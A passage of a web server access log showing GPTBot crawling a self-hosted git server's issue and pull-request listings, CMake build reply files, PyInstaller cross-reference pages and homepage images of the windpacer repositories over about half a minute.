+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11628] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:19:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html?display=source" [Client 74.7.227.38] [Length 227370] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:19:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:19:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 16092] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:19:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211065] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211048] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11953] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211048] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?state=closed&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:19:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:19:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 9857] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11374] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13131] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10143] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 